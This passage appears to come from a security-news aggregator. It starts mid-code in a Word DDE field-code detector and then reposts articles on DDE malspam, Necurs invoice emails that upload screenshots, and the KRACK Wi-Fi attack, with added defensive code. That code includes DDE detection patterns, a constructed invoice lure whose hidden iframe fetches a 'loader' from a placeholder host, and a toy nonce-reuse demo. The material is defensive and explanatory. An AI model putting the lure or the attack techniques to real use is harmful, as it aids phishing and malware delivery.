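    for el in root.iter():                       # document order
        if el.tag == W + "fldSimple":            # single-element field form
            fields.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                open_fields.append([])           # fields can nest, so keep a stack
            elif kind == "end" and open_fields:
                fields.append("".join(open_fields.pop()))
        elif el.tag == W + "instrText" and open_fields:
            open_fields[-1].append(el.text or "")
    return fields


def find_dde_fields(document_xml):
    """Field codes that start with DDE/DDEAUTO once the runs are joined."""
    return [re.sub(r"\s+", " ", code).strip()
            for code in extract_field_codes(document_xml) if DDE_RE.match(code)]


def scan_docx(path):
    """The same check against a .docx on disk (a zip containing word/document.xml)."""
    with zipfile.ZipFile(path) as z:
        return find_dde_fields(z.read("word/document.xml").decode("utf-8"))
```

On the sample, naive_string_scan returns False while find_dde_fields returns the re-assembled instruction, which is the gap the split-string trick exploits; scan_docx applies the same logic to a real file.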

Office and malspam

Microsoft Office is being abused in both targeted and large-scale campaigns by malware authors who use a wide variety of techniques to execute malicious code. The DDE method is not new at all, but it is an example of how forgotten features can come back to haunt us.

Microsoft did not deem this a vulnerability and so far has not decided to release a patch to render it harmless. One has to wonder how many people are still using DDE for legitimate purposes, and whether retaining it is justified.

Malwarebytes users are already protected against this latest campaign and similar ones.

Indicators of compromise

Word document




The post Old MS Office feature weaponized in malspam attacks appeared first on Malwarebytes Labs.

Go to Source
Author: Jérôme Segura

Necurs attackers now want to see your desktop

Recently we have seen a resurgence of emails sent by the Necurs botnet. The latest blast of emails is spreading a new variant of the Locky ransomware (Ransom.Locky) or Trickybot (Trojan.Trickybot). What’s interesting about this new wave is that the downloader now contains new functionality to gather telemetry from victims. It can take screen grabs and send them back to a remote server. There’s also an error-reporting capability that will send back details of any errors that the downloader encounters when it tries to carry out its activities.

Beware of strangers offering fake invoices

The new emails use a tried-and-tested invoice-based social engineering format, and generally contain the following details:

Subject: Status of invoice [FAKE INVOICE NUMBER]

Attachment:  [FAKE INVOICE NUMBER].html

The body of the email contains a message urging the reader to open the attachment to check the invoice.

Standard precautions apply here; when strangers offer you unsolicited invoices or deliveries via email, the safest course of action is to simply trash the email.


Figure 1. Typical invoice email sent by Necurs botnet

If the attached .html file is opened, it downloads JavaScript via an embedded iframe. The JavaScript then downloads the payload, which will be either Locky or Trickybot.
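The lure format and the attachment chain described above, turned into a mail triage check as an added example (not Symantec's own detection logic): it flags a message whose subject matches the "Status of invoice" pattern and that carries an .html attachment, and it reports any remote iframe source found inside that attachment. The message is built with Python's standard email package and uses placeholder addresses, a placeholder invoice number and a placeholder iframe host.

```python
import email
import re
from email import policy
from email.message import EmailMessage

# Heuristics for the lure format the post describes (subject + .html attachment).
SUBJECT_RE = re.compile(r"^\s*status of invoice\s+\S+\s*$", re.I)
IFRAME_RE = re.compile(r"<iframe\b[^>]*\bsrc\s*=\s*['\"]?(https?://[^'\"\s>]+)", re.I)


def build_sample_email(invoice_no="00012345", attach_html=True):
    """Constructed message with placeholder addresses and host (not a real sample)."""
    msg = EmailMessage()
    msg["From"] = "billing@sender.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "Status of invoice %s" % invoice_no
    msg.set_content("Please open the attached file to check the status of your invoice.")
    if attach_html:
        html = ('<html><body>Loading invoice...'
                '<iframe src="http://placeholder.invalid/loader" width="0" height="0">'
                '</iframe></body></html>')
        msg.add_attachment(html, subtype="html", filename="%s.html" % invoice_no)
    return msg.as_bytes()


def triage(raw_message):
    """Flag Necurs-style invoice lures: matching subject plus an .html attachment."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    result = {
        "subject_matches": bool(SUBJECT_RE.match(str(msg["Subject"] or ""))),
        "html_attachments": [],
        "remote_iframes": [],
    }
    for part in msg.iter_attachments():
        name = (part.get_filename() or "").lower()
        if name.endswith((".html", ".htm")):
            result["html_attachments"].append(name)
            body = part.get_content()
            if isinstance(body, bytes):
                body = body.decode("utf-8", "replace")
            # A hidden iframe pulling remote content is the next stage the post describes.
            result["remote_iframes"].extend(IFRAME_RE.findall(body))
    result["suspicious"] = result["subject_matches"] and bool(result["html_attachments"])
    return result
```

The same triage function accepts any raw RFC 822 message, so it can be pointed at quarantined .eml files; the iframe list gives the URLs to block or look up first.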

Attackers need operational intelligence too

Besides the standard download and execute final payload functionality, the downloader also runs a PowerShell script that takes a screen grab and saves it to a file named generalpd.jpg.

It then waits a few seconds for the save operation to complete and then launches a command to upload the saved .jpg to a remote server.


Figure 2. PowerShell script that captures a screenshot and then uploads it

This functionality is interesting because downloaders tend to just deliver a payload and then disappear as quickly as possible. When you consider the screen grab functionality together with the new error-reporting capability, it suggests that the Necurs attackers are actively trying to gather operational intelligence (OPINTEL) about the performance of their campaigns. Much like crash reports in OSes can help software companies fix issues and build better products, these error reports can help attackers spot problems in the field and address them to improve success rates. After all, you can’t count on the victims to report back errors and issues!


Necurs: back with a vengeance

Necurs went through a long spell of silence from the end of 2016 into early 2017. It burst back onto the scene around March and since then has been cranking up its activity levels, with recent months seeing the most action so far in 2017.


Figure 3. Symantec telemetry shows Necurs emails with script attachments have grown fourfold since June

With our data showing a resurgence in activity, and the apparent efforts to collect operational intelligence, we can expect to see continued evolution of the capabilities and a steady increase in Necurs activity levels in the coming months.

Whatever the attackers choose to do, our analysts will be keeping a close eye on developments as the campaigns continue to evolve.


Symantec recommends users follow these best practices to stay protected from ransomware and other threats:

  • Delete any suspicious-looking emails you receive, especially if they contain links or attachments.
  • Always keep your security software up to date to protect yourself against any new variants of malware.
  • Keep your operating system and other software updated. Software updates will frequently include patches for newly discovered security vulnerabilities that could be exploited by attackers.
  • Regularly back up any files stored on your computer. If your computer does become infected with ransomware, your files can be restored once the malware has been removed.

Go to Source
Author: Symantec Security Response

KRACK: Your Wi-Fi is no longer secure

Most vulnerabilities go unnoticed by the majority of the world’s population even if they affect several million people. But this news, published today, is probably even bigger than the recently disclosed Yahoo breach and affects several billion people all over the world: Researchers have found a bunch of vulnerabilities that make all Wi-Fi networks insecure.

A paper published today describes how virtually any Wi-Fi network that relies on WPA or WPA2 encryption can be compromised. And with WPA being the standard for modern Wi-Fi, that means pretty much every Wi-Fi network in the world is vulnerable.

The research is quite complicated, so we won’t go through it in detail and will just briefly highlight the main findings.

How KRACK works

Researchers have found out that devices based on Android, iOS, Linux, macOS, Windows, and some other operating systems are vulnerable to some variation of this attack, and that means almost any device can be compromised. They called this type of attack a key reinstallation attack, or KRACK for short.

In particular, they describe how an attack on Android 6 devices works. To execute it, the attacker has to set up a Wi-Fi network with the same name (SSID) as that of an existing network and target a specific user. When the attacker detects that the user is about to connect to the original network, they can send special packets that make the device switch to another channel and connect to the fake network with the same name.

After that, using a flaw in the implementation of the encryption protocols they can change the encryption key the user was using to a string of zeroes and thus access all of the information that the user uploads or downloads.

One may argue that there’s another layer of security — the encrypted connection to a site, e.g., SSL or HTTPS. However, a simple utility called SSLstrip set up on the fake access point is enough to force the browser to communicate with unencrypted, HTTP versions of websites instead of encrypted, HTTPS versions, in cases where encryption is not correctly implemented on a site (and that is true for quite a lot of websites, including some very big ones).

So, by using this utility in their fake network, the attacker can access the users’ logins and passwords in plain text, which basically means stealing them.
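What "key reinstallation" means in practice, as an added illustration that is not from the article or from the researchers: a toy counter-mode cipher stands in for Wi-Fi's encryption, and a simulated client resets its packet number (which serves as the nonce) whenever a key is installed. Re-installing the same key, which is what a replayed handshake message does to a vulnerable client, therefore reuses keystream, and the XOR of two ciphertexts then equals the XOR of the two plaintexts. The all-zero-key case the article mentions for Android 6 is shown as well, along with one mitigation: refusing to reinstall a key that is already in use. The hash-based keystream, the 16-byte keys and the HTTP-like plaintexts are constructed for the example.

```python
import hashlib


def keystream(key, nonce, length):
    """Toy counter-mode keystream: SHA-256(key || nonce || counter) blocks.
    Stands in for the real Wi-Fi cipher; the property that matters here
    (same key + same nonce gives the same keystream) is shared by the real one."""
    out, counter = b"", 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce.to_bytes(6, "big")
                              + counter.to_bytes(4, "big")).digest()
        counter += 1
    return out[:length]


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


class Station:
    """A Wi-Fi client holding a pairwise key and a packet number used as the nonce."""

    def __init__(self):
        self.ptk, self.pn = None, 0

    def install_key(self, ptk):
        # Vulnerable behaviour: every (re)installation resets the packet number.
        self.ptk, self.pn = ptk, 0

    def install_key_patched(self, ptk):
        # Mitigation: ignore an installation request for a key already in use.
        if ptk != self.ptk:
            self.ptk, self.pn = ptk, 0

    def encrypt(self, plaintext):
        self.pn += 1
        return self.pn, xor(plaintext, keystream(self.ptk, self.pn, len(plaintext)))


def decrypt(key, pn, ciphertext):
    return xor(ciphertext, keystream(key, pn, len(ciphertext)))


def reinstallation_demo(patched):
    """Encrypt two frames with a key reinstallation in between; report what leaks."""
    ptk = b"\x11" * 16                     # constructed key, fixed for reproducibility
    sta = Station()
    sta.install_key(ptk)
    p1 = b"GET /account HTTP/1.1 Cookie: session=AAAA"
    p2 = b"GET /account HTTP/1.1 Cookie: session=BBBB"
    pn1, c1 = sta.encrypt(p1)
    # A replayed handshake message carrying the same key arrives here.
    (sta.install_key_patched if patched else sta.install_key)(ptk)
    pn2, c2 = sta.encrypt(p2)
    # With a reused keystream, XOR of the ciphertexts equals XOR of the plaintexts,
    # so an observer learns exactly where and how the two frames differ.
    return {"nonce_reused": pn1 == pn2, "xor_leaks": xor(c1, c2) == xor(p1, p2)}


def zero_key_demo():
    """The Android 6 case the article describes: the installed key becomes all
    zeros, so anyone who knows that decrypts the traffic directly."""
    sta = Station()
    sta.install_key(b"\x00" * 16)
    pn, c = sta.encrypt(b"secret")
    return decrypt(b"\x00" * 16, pn, c)
```

reinstallation_demo(False) reports both nonce reuse and the XOR leak; reinstallation_demo(True) reports neither, because the patched client keeps counting packet numbers instead of restarting from zero.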


What can you do to secure your data?

The fact that almost every device in almost every Wi-Fi network is vulnerable to KRACK sounds quite scary, but — like pretty much any other type of attack — this one is not the end of the world. Here are a couple of tips on how to stay safe from KRACK attacks in case anyone decides to use them against you.

  • Always check to make sure there’s a green lock icon in the address bar of your browser. That lock indicates that an HTTPS (encrypted and therefore secure) connection to this particular website is being used. If someone attempts to use SSLstrip against you, the browser will be forced to use HTTP versions of websites, and the lock will disappear. If the lock is in place, your connection is still secure.
  • The researchers warned some network appliance manufacturers (including the Wi-Fi Alliance, which is responsible for standardizing the protocols) in advance of releasing their paper, so most of them should be in the process of issuing firmware updates that fix the key reinstallation issue. So check whether there are fresh firmware updates for your devices and install them as soon as possible.
  • You can secure your connection using a VPN, which adds another layer of encryption to the data transferred from your device. You can read more on what a VPN is and how to choose one, or grab Kaspersky Secure Connection right away.

Go to Source
Author: Alex Perekalin